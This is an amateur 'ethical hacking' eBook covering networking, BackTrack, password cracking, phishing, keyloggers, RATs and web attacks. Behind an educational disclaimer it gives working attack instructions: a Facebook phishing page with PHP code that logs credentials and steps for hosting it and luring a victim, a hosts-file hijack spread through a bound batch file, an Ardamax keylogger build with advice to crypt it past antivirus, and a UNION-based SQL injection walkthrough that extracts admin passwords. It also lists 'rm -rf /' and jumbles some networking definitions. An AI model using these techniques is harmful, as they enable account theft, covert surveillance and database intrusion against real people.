“what they keep secret we expose”
By
Copyright Notice
Any unauthorized use, distribution or reproduction of this eBook without the permission of its author is strictly prohibited.
Liability Disclaimer
The information provided in this eBook is to be used for educational purposes only. The eBook creator is in no way responsible for any misuse of the information provided. All of the information in this eBook is meant to help the reader develop a hacker defence attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage, directly or indirectly. The words “Hack” and “Hacking” in this eBook should be regarded as “Ethical Hack” and “Ethical hacking” respectively.
You implement the information given at your own risk.
Contents
Introduction
  What is ethical hacking
  Who is a hacker
  Types of hackers
  Who can use this book
NETWORKING
  a) Concept of networking
  b) Basics about TCP & UDP
Programming
  Do I really need it?
  Where should I start?
Backtrack
  What is it?
  2. Installing & Running Backtrack
    1) Clean Hard drive install
    2) Dualboot Installation
    3) USB installation
  Basic Linux Commands
Password Cracking
  1) Brute Force
  2) Dictionary Based attack
  3) Rainbow tables
Phishing
  1) Demo (How crackers hack your facebook account using phishing)
  Desktop phishing
Social Engineering
Keylogging
  Demo: How to hack using Ardamax Keylogger
RAT (Remote Access Trojan)
Malware
Web Hacking
  Footprinting
  Port Scanning
  SQL Injection
  Authentication Bypass
  XSS
  CSRF
  Buffer Overflow
  RFI
  LFI
  Open Redirection
Introduction
What is ethical hacking
Ethical hacking is the process of finding vulnerabilities in a computer system, using programming or non-programming skills (much like rooting an Apple device without any software), and then exploiting those vulnerabilities.
Who is a hacker
A hacker is someone who uses his computer knowledge to find vulnerabilities in computer systems and then exploits them, for any reason: patriotism, malicious purposes, or a personal grudge against the owner of that system.
Types of hackers
There are basically three types of hackers:
1. Grey Hat
They are a combination of Black Hat and White Hat hackers: sometimes they work defensively and sometimes offensively.
2. White Hat
Their sole purpose is to test websites, individually or for a company, and report the vulnerabilities they find.
3. Black Hat
They break system security for malicious purposes, including identity theft, credit card theft, destruction of data, etc.
Other than these there are also some other types:
1. Elite Hackers
They are highly skilled hackers and good programmers as well. They create new exploits and also help in cyber security awareness.
2. Script Kiddies
They are non-experts who usually hack using programs created by others, but they rank a step above Neophytes.
3. Neophyte
These are the newbies or n00bs who don't know anything about hacking and other techniques.
4. Blue Hat
A person outside a security company or firm who tests the security of its applications or hunts for bugs in them.
5. Hacktivists
A hacktivist is a hacker who breaks into a system to announce a social, political or religious message.
Who can use this book
Anybody who is interested in cyber security, including students, administrators, webmasters, analysts, engineers and so on; in fact everybody who is connected to the internet can use its content to get some awareness about the latest cyber attacks.
NETWORKING
a) Concept of networking
Networking is the process of connecting two or more computers in order to communicate and share resources such as printers, data, etc.
a) LAN
A Local Area Network (LAN) is a network that is confined to a relatively small area. It is generally limited to a geographic area such as a writing lab, school, or building.
b) WAN
Wide Area Networks (WANs) connect networks in larger geographic areas, such as Kashmir, Palestine, or the world. Dedicated transoceanic cabling or satellite uplinks may be used to connect this type of global network.
c) MAN
A Wide Area Network or WAN is a type of networking where a number of resources are installed across a large area, such as a multinational business. Through a WAN, offices in different countries can be interconnected. The best example of a WAN is the Internet, the largest network in the world. In a WAN, computer systems on different sites can be linked.
d) Peer to Peer (P2P)
A peer-to-peer (abbreviated P2P) computer network is one in which each computer in the network can act as a client or server for the other computers in the network, allowing shared access to various resources such as files, peripherals, and sensors without the need for a central server.
b) Basics about TCP & UDP
Transmission Control Protocol (TCP) | User Datagram Protocol (UDP)
It is a connection oriented protocol | It is a connectionless protocol
Message delivery is guaranteed | Message delivery isn't guaranteed
Data arrives in order | There is no ordering of arriving data
Packets are sent as a stream | Packets are sent individually
Packets are retransmitted | There is no retransmission of packets
It is slow because of extensive error checking | It allows only basic error checking, making it faster than TCP but less robust
E.g. include HTTP, SMTP, |
Programming
Do I really need it?
To become a good hacker you should possess good programming skills. It's the only way you will create your own exploits and tools, which will help you a lot on your way to becoming a good hacker.
“Eat, Drink & code, Or your system will overload” – Microsoft*(Hack Marathon)
Where should I start?
This is the most important question every newbie asks. The easiest way is to start reading books, clear the basics, then move on to advanced topics; and, importantly, take references from experienced programmers.
Type | Description | E.g.
Compiled | Those which are processed by a compiler | C, C++, C#, Visual Basic, Visual FoxPro etc.
Multiparadigm | They allow a program to use more than one programming style | PHP, Python, Perl etc.
1) Always take languages which are easy to understand.
2) Try to make your own programs as soon as possible.
3) Look at your code and try to understand every example: how and what the code does, why we need it, and so on.
4) Learn how to use a debugger.
5) If you are not able to understand something, clear your ideas on online forums like Stack Overflow.
6) All languages are almost the same; the only difference is the syntax. That's why you should take only the language you think you can understand, so that it will be easy for you to understand other languages too.
7) Keep coding, coding & coding.
What is it?
BackTrack is a distribution based on the Debian GNU/Linux distribution aimed at digital forensics and penetration testing use. The current version is BackTrack 5 R3. It consists of many tools. BackTrack arranges its tools into 12 categories:
Information gathering, Vulnerability assessment, Exploitation tools, Privilege escalation, Maintaining access, Reverse engineering, RFID tools, Stress testing, Forensics, Reporting tools, Services, Miscellaneous.
Some of the well known security tools it includes are: Metasploit for integration; RFMON injection-capable wireless drivers; Aircrack-ng; Kismet; Nmap; Ophcrack; Ettercap; Wireshark (formerly known as Ethereal).
2.Installing & Running Backtrack
There are 4 ways by which you can install BackTrack, depending on your needs:
i. Clean hard drive install: the whole drive is used for BackTrack.
ii. Dual boot installation: your system already has a Windows OS taking up all the space in your hard drive; you resize or partition your drive to install a dual OS, i.e. Windows + BackTrack.
iii. USB installation: installing BackTrack, either clean hard drive or dual boot, from a USB drive instead of a DVD.
1) Clean Hard drive install
Boot BackTrack on the machine to be installed. Once booted, type in “startx” to get to the KDE graphical interface.
Double click the “install.sh” script on the desktop, or run the command “ubiquity” in console.
Select your geographical location and click “forward”. Same for the Keyboard layout
The next screen allows you to configure the partitioning layout. The assumption is that we are deleting the whole drive and installing BackTrack on it.
Accept the installation summary and click “Install”. Allow the installation to run and complete.
Restart when done
Log into BackTrack with the default username and password root / toor. Change root password.
Fix the framebuffer splash by typing “fix-splash” (or “fix-splash800” if you wish an 800×600 framebuffer), then reboot.
2) Dualboot Installation
Boot BackTrack on the machine to be installed. Once booted, type in “startx” to get to the KDE graphical interface.
Double click the “install.sh” script on the desktop, or run the command “ubiquity” in console.
Select your geographical location and click “forward”. Same for the Keyboard layout.
The next screen allows you to configure the partitioning layout. The assumption is that we are resizing the Windows 7 partition and installing BackTrack in the newly made space.
Grub should allow you to boot both into BackTrack and Windows.
Log into BackTrack with the default username and password root / toor. Change root password.
Fix the framebuffer splash by typing “fix-splash” (or “fix-splash800” if you wish an 800×600 framebuffer), then reboot.
Accept the installation summary and click “Install”. Allow the installation to run and complete. Restart when done.
3) USB installation
Plug in your USB drive (minimum USB drive capacity 2 GB).
Format the USB drive to FAT32.
Download Unetbootin from http://unetbootin.sourceforge.net/
Start Unetbootin and select “diskimage” (use your BackTrack ISO).
Select your USB drive and click “OK” to create a bootable BackTrack USB drive.
Log into BackTrack with the default username and password root / toor.
Basic Linux Commands
startx: start the GUI in BackTrack
halt: shut down
sleep: sleep
reboot: restart
cd: change directory
ls -la: list a directory (long format, including hidden files)
mv $folder $newfolder: change the name of a directory
pwd: print working directory
find / -name love: find a file named love, searching from the root directory
rm -r: remove an existing directory
cp: copy files
killall program: kill all processes of that program
ps aux: show running processes
ifconfig: show network interfaces (the Linux counterpart of ipconfig)
gcc in_file -o out_file: compile C files
sudo: run a command with super user rights
ping host: send an echo request to the specified host
id: show which user you are logged in as
cat /etc/passwd: show the account list
uname -r: show the kernel release
uname -a: show the kernel version
dpkg -l: list all installed packages
last -30: show the last 30 login records
useradd: add a user account
usermod: modify a user account
w: show logged-in users
locate password.txt: show the location of password.txt (it searches the locate database, not just the current directory)
rm -rf /: remove everything on the system (destructive; never run it on a machine you care about)
chmod ### $folder: change the permissions of a folder
lsmod: list the loaded kernel modules
For beginners there are a lot of websites which teach Linux for free; check out http://www.beginlinux.org/ or just Google it.
Password Hacking
The process of stealing a password or credentials from the legitimate user is called password hacking. There are many ways by which we can get the password of a device, email, router, account and so on.
Password Cracking
The process by which we get a password by trying a range of characters or predefined words is called password cracking. Passwords can be cracked in the following ways:
a) Brute force attack
b) Dictionary based attack
c) Rainbow tables
1) Brute Force
Brute force is a technique used by an application program to decode any encrypted data (encoded using an algorithm). What a brute force program actually does is take all possible combinations of legal characters, i.e. alphabets (both uppercase and lowercase), numbers and symbols, and try them one by one. If the password length is 4 and it contains only lowercase alphabets, with no special characters or numbers, it will start brute forcing like this: “a”, “aa”, “aaa”, “aaaa”, “aaab”, “aaac” and so on. These programs can attempt many strings per minute. Strongly encrypted data (a password using alphabets in both cases, numbers and symbols) can take many days to decrypt. Given enough time these programs can overcome any encrypted data (password/hash). Some of the commonly used programs are Cain & Abel, Brutus, John The Ripper etc. BackTrack contains many brute force tools.
2) Dictionary Based attack
In this technique a program uses an English dictionary to decrypt an encrypted cipher: the program tries all the legal words contained in the dictionary against the password/hash, known as the cipher. Cain & Abel, Brutus and John The Ripper are some of the tools used to launch a dictionary based attack.
3) Rainbow tables
Rainbow tables are a large database of precomputed ciphers together with the actual plaintext from which they were calculated. Rainbow table generators are the tools which take all possible combinations of legal characters, calculate their hash using your desired algorithm and store them in a large database. Common cryptographic algorithms used in CMSs are:
Cryptographic hash | Length | Note
MD5 | 128 bits | 32 char hexadecimal
MD5 Salted | 128 bits : any length | Contains two blocks: 32 char hex : random salt
SHA1 | 160 bits | 40 char hexadecimal
SHA256 | 256 bits | 64 char hexadecimal
MySQL 5 | 164 bits | 41 char, all characters capital, starts with an asterisk *
MD5 (WordPress) | 136 bits | 34 char, starts with $P$, variable-case alphanumeric
MD5 (phpBB3) | 136 bits | 34 char, starts with $H$
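As an added illustration (not code from this eBook), the Python below recognises the hash formats in the table above by their length and prefix, builds a small precomputed lookup table from a constructed wordlist, and shows why a per-user salt defeats such a table. A real rainbow table stores hash chains rather than every digest, but a lookup hits the same way; the wordlist, the salt and the sample hashes are constructed.

```python
import hashlib
import re

# Formats from the table above, recognised by length and prefix only
# (the bit lengths in the table are not needed for recognition).
HASH_FORMATS = [
    ("MD5 (WordPress)", re.compile(r"^\$P\$[./0-9A-Za-z]{31}$")),  # 34 chars, $P$ prefix
    ("MD5 (phpBB3)",    re.compile(r"^\$H\$[./0-9A-Za-z]{31}$")),  # 34 chars, $H$ prefix
    ("MySQL 5",         re.compile(r"^\*[0-9A-F]{40}$")),          # 41 chars, '*' + upper hex
    ("MD5",             re.compile(r"^[0-9a-fA-F]{32}$")),         # 32 hex chars
    ("SHA1",            re.compile(r"^[0-9a-fA-F]{40}$")),         # 40 hex chars
    ("SHA256",          re.compile(r"^[0-9a-fA-F]{64}$")),         # 64 hex chars
    ("MD5 Salted",      re.compile(r"^[0-9a-fA-F]{32}:.+$")),      # hash:salt, two blocks
]


def identify_hash(value):
    """Return the names of every format in the table that `value` could be."""
    return [name for name, pattern in HASH_FORMATS if pattern.match(value)]


def build_lookup_table(words, algorithm="md5"):
    """Precompute digest -> plaintext for each candidate word.

    This is the 'generator' step the text describes: every candidate is hashed
    once and stored, so a later lookup costs one dictionary access.
    """
    table = {}
    for word in words:
        digest = hashlib.new(algorithm, word.encode()).hexdigest()
        table[digest] = word
    return table


def lookup(table, digest):
    """Recover the plaintext for `digest`, or None if it was never precomputed."""
    return table.get(digest.lower())


def salted_md5(password, salt):
    """Produce an 'MD5 Salted' value in the hash:salt layout of the table above."""
    digest = hashlib.md5((salt + password).encode()).hexdigest()
    return digest + ":" + salt


# Constructed sample wordlist standing in for a dictionary / table input.
WORDLIST = ["password", "letmein", "qwerty", "iloveyou", "123456"]


def demo():
    """Unsalted MD5 is recovered instantly; the salted form of the same password is not."""
    table = build_lookup_table(WORDLIST)
    plain_hit = lookup(table, hashlib.md5(b"letmein").hexdigest())
    salted_value = salted_md5("letmein", "f3a9")           # constructed salt
    salted_hit = lookup(table, salted_value.split(":")[0])  # the table never saw salt+password
    return plain_hit, salted_hit


if __name__ == "__main__":
    print(demo())                                          # ('letmein', None)
    print(identify_hash(salted_md5("letmein", "f3a9")))    # ['MD5 Salted']
```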
Phishing
Phishing is the most common way to acquire personal information such as usernames, passwords, email ids, credit card info etc. If you are too lazy to inspect some basic information, like looking at the URL before clicking on any link, then you will soon lose access to your accounts. Here is a demo of how to hack into any account using phishing.
1) Demo (How crackers hack your facebook account using phishing)
1. Go to facebook.com.
2. Right click anywhere on the page and click “View page source”.
3. Copy all the source code into Notepad or any editor.
4. Change “action=https://www.facebook.com/login.php?login_attempt=1” to “action=next.php” and method=“post” to method=“get”, and save the whole page as anything, say hello.php.
5. Now open a new page in Notepad and write the following code into it:
<?php
header("Location: https://login.facebook.com/login.php");
$handle = fopen("passes.txt", "a");
foreach($_GET as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
and save it as next.php in the same directory. I will not go deep into what these lines do.
6. Now again open a new page in Notepad and save it as passes.txt (keep the page blank).
7. Create a hosting account at any free hosting website, say bytehost, and get your domain, say XXXXXX.bytehost.com.
8. Now open your dashboard and click on File Manager. Under File Manager click on public_html.
9. Upload all three files to the public_html folder.
10. Now your URLs will be like this:
XXXXXX.bytehost.com/index.php
XXXXXX.bytehost.com/next.php
XXXXXX.bytehost.com/passes.txt
11. Give your URL XXXXXX.bytehost.com/index.php to your victim and try to convince him to log in with his credentials. (I am kidding, don't try to pwn anyone; it's only for educational purposes.)
In the image I logged in with username=aa and password=aa.
12. When anybody logs in to that website with his email id and password, the credentials will be saved at XXXXXX.bytehost.com/passes.txt and he will be redirected to the real Facebook login page.
Whoo, you have got the credentials of your victim.
This tutorial is only for educational purposes, and will make you aware of how hackers hack into your profiles by phishing.
How to Prevent yourself from being a victim of phishing
The best way to prevent phishing is to always double check (even if your eyesight is weak :P lol) the URL of the Facebook website, and always use a secure connection, “https://” instead of “http://”, i.e. https://www.facebook.com. Hackers always use domain names similar to facebook, like facebok, facebuk, face-bok and so on.
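The two checks just described (https in use, and the host really being the genuine site rather than a lookalike such as facebok or face-bok) can be automated. The Python below is an added example, not part of the eBook; it assumes the genuine site is exactly facebook.com and treats any label within two edits of "facebook" as a lookalike.

```python
from urllib.parse import urlsplit

# The genuine site the prevention advice refers to (assumption: exactly this name).
GENUINE_DOMAIN = "facebook.com"


def edit_distance(a, b):
    """Levenshtein distance: how many single-character edits turn a into b."""
    previous = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        current = [i]
        for j, cb in enumerate(b, 1):
            current.append(min(previous[j] + 1,                 # delete
                               current[j - 1] + 1,              # insert
                               previous[j - 1] + (ca != cb)))   # substitute
        previous = current
    return previous[-1]


def check_login_url(url, genuine=GENUINE_DOMAIN, max_edits=2):
    """Apply the checks from the text. Returns (ok, reason);
    anything other than (True, "genuine") deserves a second look before typing a password."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return False, "no host in URL"
    if parts.scheme != "https":
        return False, "not https"
    if host == genuine or host.endswith("." + genuine):
        return True, "genuine"
    genuine_label = genuine.split(".")[0]          # "facebook"
    if genuine_label in host:
        # e.g. facebook.com.evil.tld: the real name is only a decoy label inside another domain
        return False, "genuine name embedded in another domain"
    for label in host.split("."):
        if edit_distance(label, genuine_label) <= max_edits:
            return False, "lookalike domain: " + label
    return False, "different site"


if __name__ == "__main__":
    # Constructed sample URLs, including the lookalike names from the text above.
    for sample in ["https://www.facebook.com/login.php",
                   "http://www.facebook.com/",
                   "https://www.facebok.com/",
                   "https://face-bok.com/",
                   "https://www.facebook.com.evil.tld/login",
                   "https://xxxxxx.bytehost.com/index.php"]:
        print(sample, check_login_url(sample))
```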
Desktop phishing
The hosts file is a system file used by the operating system to map hostnames to their IP addresses. It is located at %windir%\System32\drivers\etc. Things you need:
1. A static IP, or you can use a VPN which assigns you a static IP, like Strong Open VPN (download it here).
2. A web server: WAMP or XAMPP.
3. A Facebook phisher (already built in the simple phishing tutorial above).
4. A desktop phishing script.
5. A binder. Google them.
Install WAMP and the VPN.
Now copy the phishing files, i.e. hello.html, next.php and passes.txt, to the root directory of your web server; for WAMP it is %installation directory%/wamp/www.
Now open Notepad and enter the desktop phishing script.
Replace 0.1.2.3 in the desktop phishing script with the IP address you got from the VPN (to check your IP address go to http://cmyip.com) and save the file as anything.bat.
This file could look suspicious to the person you are sending it to, through email or any data transfer medium. So we will bind it with another file using a binder; Google them, you will find loads of binders out there.
After the victim executes your .bat file, his hosts file gets an entry like this:
and whenever he enters www.facebook.com he will be redirected to your IP address hosting the phisher.
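The tampering just described leaves a fingerprint: a well-known hostname mapped to a non-local address in the hosts file. The Python below is an added example, not part of the eBook; it parses a constructed hosts file sample and flags such entries, assuming the usual Windows path for the real file.

```python
import ipaddress

# Names that a normal machine should never resolve through the hosts file.
# Constructed watchlist; extend it with the sites your users log in to.
WATCHED_NAMES = {"facebook.com", "www.facebook.com"}

# Constructed sample of a hosts file after the tampering described in the text.
SAMPLE_HOSTS = """\
# constructed sample, not a real machine's file
127.0.0.1       localhost
::1             localhost
0.1.2.3         www.facebook.com
0.1.2.3         facebook.com
127.0.0.1       ads.example.invalid   # a harmless ad-blocking style entry
"""


def parse_hosts(text):
    """Return (ip_address, hostname) pairs, ignoring comments, blank and malformed lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            address = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                     # first field is not an address: skip the line
        for name in fields[1:]:
            entries.append((address, name.lower().rstrip(".")))
    return entries


def suspicious_entries(text, watched=WATCHED_NAMES):
    """Return [(hostname, ip)] for watched names mapped anywhere except loopback/unspecified."""
    hits = []
    for address, name in parse_hosts(text):
        if name in watched and not (address.is_loopback or address.is_unspecified):
            hits.append((name, str(address)))
    return hits


def audit_hosts_file(path=r"C:\Windows\System32\drivers\etc\hosts"):
    """Audit the real file; the default path is the usual Windows location (assumption)."""
    with open(path, encoding="utf-8", errors="replace") as handle:
        return suspicious_entries(handle.read())


if __name__ == "__main__":
    print(suspicious_entries(SAMPLE_HOSTS))
    # [('www.facebook.com', '0.1.2.3'), ('facebook.com', '0.1.2.3')]
```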
Social Engineering
It's one of the biggest threats to our privacy. It's an act by which an attacker manipulates people's minds so that they give their confidential information to the attacker. They usually trick people by reading their body language. The biggest scams, like fake lotteries, money transfers etc., are the result of social engineering. It plays a vital role in any type of phishing. It is the biggest threat to companies: the attackers usually trick employees of the company, resulting in the theft of financial or confidential information. An attacker usually calls or emails people, tells them he is from customer care/support and asks them some personal questions like their name, D.O.B., residence, email id and password; most people give their personal information, including their password, thinking that they are getting that call/email from a legitimate source. After collecting some information they get access to your secret information/accounts. And bang! The victim gets social engineered.
Keylogging
Keylogging is the method of tracking the keys struck on a keyboard. It can be done in two ways, using either a software keylogger or a hardware keylogger. Both of these keyloggers store the keys struck on the keyboard in memory in the form of logs. Later these logs can be sent to the email id or the FTP of the attacker.
Software Keylogger: They usually consist of two files, a “.dll” and an “.exe” file. The .exe file executes the dll file and makes the keylogger work. They are bound and encrypted, making it hard for an anti-virus to find any evidence. They usually work in stealth mode, making them even harder for the victim to find. They have many features like:
1. They work in stealth mode.
2. They capture screenshots.
3. They include a remote deployment wizard.
4. Registry entries are hidden.
5. They track websites visited.
6. They track applications used.
7. They capture HTTP POST operations.
8. They capture video of the victim using the webcam.
9. They record surrounding sound using a connected microphone.
10. Logs can be exported as txt or html.
11. User friendly interface.
12. They can track your location.
13. Automatic delivery of logs after an interval set by the attacker.
14. They capture chat logs.
Demo: How to hack using Ardamax Keylogger.
1. Buy Ardamax Keylogger from their site, or just Google it if you don't want to spend money. You will get a pro version with a remote deployment wizard. Install the setup. Now register your
2. After registering, click on Remote Installation.
3. Click Next until you reach the Security dialog; click on Enable and set a password. After that click on Next. Now you will get the Options dialog; here set your magic keys. Click Next. Now comes the first part of the Control section: select the method and time interval through which you want to receive the logs, as shown in image “4”. Click Next. Now comes the heart of this tutorial; if you make some mistakes here your keylogger will not work. Enter the details as shown in image “5”. Click Next. After clicking Next you will get another Control dialog as shown in image “6”. Keep your desired settings here and click Next.
4. Keep clicking Next until you get the Destination dialog. Select your path, change the icon and click Next until the wizard completes and you get a successful build message.
5. After building you need to crypt it so that it will not get detected by anti-virus. Download any good FUD (Fully UnDetectable) crypter (Google it), which will crypt your keylogger so it can bypass anti-virus.
Note: This file will get detected by most anti-virus programs, so keep your anti-virus disabled until you have made your keylogger.
6. Now share your keylogger through your social engineering talent :P :D
RAT (Remote Access Trojen)
It is a type of Trojan which is used to gain control over the victim's machine. Once installed it can do whatever the attacker wishes: create files and folders, open the CD drive, play popups, use your files, upload and download files on your machine. After installing it on your machine an attacker can do all these things remotely:
1. Create, open & delete files & folders.
2. Format the complete hard disk.
3. Install malicious programs.
4. Overload your memory, RAM or ROM.
5. Use your system for malicious purposes like DDoS.
6. Hide files & folders.
7. Control your peripherals & start or kill your processes.
8. Record music & video.
9. Steal passwords.
10. Print rich contents & view your screen.
Some of the commonly used RATs are Cybergate, DarkComet, LAN Filtrator and Spy-Net.
Malware
Malware is a piece of script which is used to destroy or disable computers, gather sensitive data, gain access to private networks, create backdoors or interrupt a private computer network. It includes worms, Trojans, adware, spyware, rootkits and viruses. In short, when we combine all types of computer threats they are known as malware. It is usually used to spy on foreign networks, government organizations, or the corporate sector. It can be a piece of script, software or active content. It usually copies itself from one network to another using removable disks. It is distributed through social networking sites, file sharing websites, or infected websites. Once the file is installed on your device it connects to the internet and downloads its other modules.
Web Hacking
Website hacking is the process of penetrating a web application by exploiting a vulnerability in it. Below are some of the techniques used by attackers.
Footprinting
This is the first step of ethical hacking. Before a pen tester goes deep, the most important thing is to gather some information about the machine. It includes checking open ports, whois, nslookup etc.
a) Open Ports: Firstly we need to know what networking ports are. A port is a specific software endpoint, belonging to an application or process, on a computer's host operating system. E.g. port 80 = HTTP, 21 = FTP, 443 = SSL. To find the open ports on an end user system we have many tools available; the most widely used tool is Nmap, which helps us detect ports on a remote system. There are also many online websites which help you find the open ports on a remote system, like yougetsignal, canyouseeme, t1shopper etc.
b) Banner Grabbing: After finding the open ports comes banner grabbing. It is the technique by which an attacker can get some really important information about the services running on the remote system, like the operating system, service application version, developer etc. You can get this information simply using telnet. Open a command prompt and enter the command as shown in the image, replacing google.com with your website.
After entering this you will get some information like the one shown in the image.
After getting the banner information an attacker finds the exploit for the services running on that remote host. Commonly used exploit databases are exploit-db, 1337day, metasploit, security vulns.
c) Other than these methods an attacker can use various other techniques to dig up information from online sources, like whois. It is the method by which an attacker can get information about the organization or individual that registered the domain name, like name, address, email etc. Commonly used websites for whois lookups are whois.net, whois.com, who.is, Network Solutions.
d) Nslookup: It is the technique to get information about the name servers of a domain and map DNS records. It comes pre-installed with the Windows OS. To get information about a domain follow the steps shown in the image. Or you can use online services like Network-tools to do an nslookup.
e) Tracert: It is another important tool; it allows an attacker to find the route and delay time to the remote host, using the simple command “tracert<space>yoururl.ext”, e.g. tracert yahoo.com.
Port Scanning
Port scanning is one of the important aspects of ethical hacking. We can scan ports both with and without using software. One of the best tools for scanning ports is Nmap. For Windows, download the GUI of Nmap, called Zenmap, from their official website.
For Linux users, open a terminal and type “sudo apt-get install nmap” (without quotes). It comes preloaded with BackTrack Linux.
For Windows: after installing, open zenmap.exe and the Nmap GUI will open in front of you. Enter the URL in the URL field and choose your profile depending upon your needs.
Since these tools leave a bunch of traces, including your IP address, they can sometimes create a problem for the person scanning a remote host. Therefore it is better to use an alternative, and most people prefer to do everything through a website without installing such software on their machine. Here I have an alternative: ScanPlanner is a website which detects many useful things on a remote host, including ports, OS, and remote services/versions. Go to ScanPlanner, enter your URL in the input box, select the appropriate check boxes and click Run Scan.
Besides ScanPlanner there is another site known as yougetsignal which allows us to find much useful information about a website, including ports, reverse IP, network location etc.
SqlInjection
Before SQL injection we have to know about SQL. SQL, or Structured Query Language, as the name implies is a language responsible for updating, deleting and requesting information from database management systems. SQL injection is a flaw in an application which exploits a bug that can allow an attacker to get sensitive information from the database. It is one of the deadliest hacking techniques used by attackers. It is caused by a vulnerability where user input is not filtered properly, so the user input is allowed to execute as a SQL statement in the application's database. The attacker inserts a SQL command (query) into the entry form or any input field, and it gets executed by the database, enabling the attacker to manipulate the database. A successful SQL injection can enable an attacker to read data from the database or write data into the database.
• User input is sent directly to the database interpreter as part of a SQL query without filtering the input.
• The attacker tricks the interpreter using specially crafted SQL queries.
• Using SQL queries an attacker can do whatever he wants, e.g. delete, read, write or update data.
• With a SQL injection vulnerability an attacker can deface the website.
• Upload malicious files and thus get access to the whole server and execute remote code on the host operating system.
Demo:
String SQLQuery = "SELECT Username, Password From users where username='" + txtUsername.text + "' AND Password='" + txtPassword.text + "'";
If an attacker inserts ' or '1'='1 as both the username and the password, the query becomes
SELECT Username, Password From users where username='' or '1'='1' AND Password='' or '1'='1'
As we know, one is always equal to one, so the condition is true for every row: it logs the attacker in as a user and returns data from the database, allowing an unauthorised user to view sensitive data. Later an attacker can edit, update, or delete from the database.
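The demo above, reproduced as an added example (not code from this eBook) in Python with an in-memory SQLite table standing in for the users table: the concatenated query is bypassed by the ' or '1'='1 input, while the parameterised version, which is the fix, treats the same input as a plain (non-matching) username. The table contents are constructed.

```python
import sqlite3

PAYLOAD = "' or '1'='1"     # the input from the demo above


def make_db():
    """In-memory stand-in for the users table in the demo (one constructed row)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (Username TEXT, Password TEXT)")
    con.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    con.commit()
    return con


def login_vulnerable(con, username, password):
    """Same construction as the demo: user input is pasted into the SQL text."""
    query = ("SELECT Username, Password FROM users WHERE Username='" + username +
             "' AND Password='" + password + "'")
    return con.execute(query).fetchall()


def login_safe(con, username, password):
    """Parameterised query: the driver sends the values separately, so they are
    compared as data and can never change the statement's structure."""
    query = "SELECT Username, Password FROM users WHERE Username=? AND Password=?"
    return con.execute(query, (username, password)).fetchall()


def quote_probe_errors(con):
    """The single-quote test from the page: the concatenated query breaks, the safe one does not."""
    try:
        login_vulnerable(con, "test'", "x")
        vulnerable_errored = False
    except sqlite3.OperationalError:
        vulnerable_errored = True
    try:
        login_safe(con, "test'", "x")
        safe_errored = False
    except sqlite3.OperationalError:
        safe_errored = True
    return vulnerable_errored, safe_errored


def demo():
    """Rows returned for the payload as (vulnerable, safe)."""
    con = make_db()
    bypassed = login_vulnerable(con, PAYLOAD, PAYLOAD)   # ... or '1'='1' matches every row
    blocked = login_safe(con, PAYLOAD, PAYLOAD)           # no user is literally named ' or '1'='1
    return len(bypassed), len(blocked)


if __name__ == "__main__":
    print(demo())                          # (1, 0)
    print(quote_probe_errors(make_db()))   # (True, False)
```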
Testing for SQL injection vulnerability
The easiest way is to add a single quote (') after the value of a parameter:
http://vulnerablesite.tld/index.php?id=test'
If you get an error like “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line”, or if you notice something went missing from the page (a picture, text etc.), or the webpage takes a long time to open after adding the single quote, then that website is vulnerable. Sometimes you will get a more generic response from the server, like HTTP status code 500, which means the SQL statement was invalid.
Manual SQL Injection Demo
(From Xedlgubaid.blogspot.com)
1). Check for vulnerability
Let's say that we have some site like this: http://www.site.com/news.php?id=5
Now, to test if it is vulnerable, add a quote ('), and that would be
http://www.site.com/news.php?id=5'
So if we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar, as discussed above in Testing for SQL injection vulnerability.
2). Find the number of columns
To find the number of columns we use the ORDER BY statement, incrementing the number until we get an error:
http://www.site.com/news.php?id=5 order by 1/* <-- no error
http://www.site.com/news.php?id=5 order by 2/* <-- no error
http://www.site.com/news.php?id=5 order by 3/* <-- no error
http://www.site.com/news.php?id=5 order by 4/* <-- error (we get a message like "Unknown column '4' in 'order clause'" or something like that)
That means that it has 3 columns, because we got an error on 4.
3). Check for UNION function
With UNION we can select more data in one SQL statement. So we have
http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that the number of columns is 3 in section 2).)
If we see some numbers on screen, i.e. 1 or 2 or 3, then the UNION works.
4). Check for MySQL version
http://www.site.com/news.php?id=5 union all select 1,2,3/*
NOTE: if /* is not working or you get some error, then try -- instead. It's a comment, and it's important for our query to work properly.
Let's say that we have number 2 on the screen. Now to check for the version we replace the number 2 with @@version or version() and get something like 4.1.33-log or 5.0.45 or similar.
It should look like this:
http://www.site.com/news.php?id=5 union all select 1,@@version,3/*
If you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..." then we have to use the convert() function:
http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
Or with hex() and unhex():
http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*
and you will get the MySQL version.
5). Getting table and column name
Well, if the MySQL version is < 5 (i.e. 4.1.33, 4.1.12, ...) <--- later I will describe MySQL > 5 versions. We must guess table and column names in most cases. Common table names are: user/s, admin/s, member/s ... Common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...
i.e. it would be
http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good)
We know that table admin exists... now to check column names.
http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column names)
We get the username displayed on screen; an example would be admin, or superadmin etc...
Now to check if column password exists:
http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column names)
We see the password on the screen, in hash or plain-text; it depends on how the database is set up, i.e. md5 hash, mysql hash, sha1...
Now we must complete the query to look nice. For that we can use the concat() function (it joins strings), i.e.
http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
Note that I put 0x3a; it's the hex value for : (so 0x3a is the hex value for a colon).
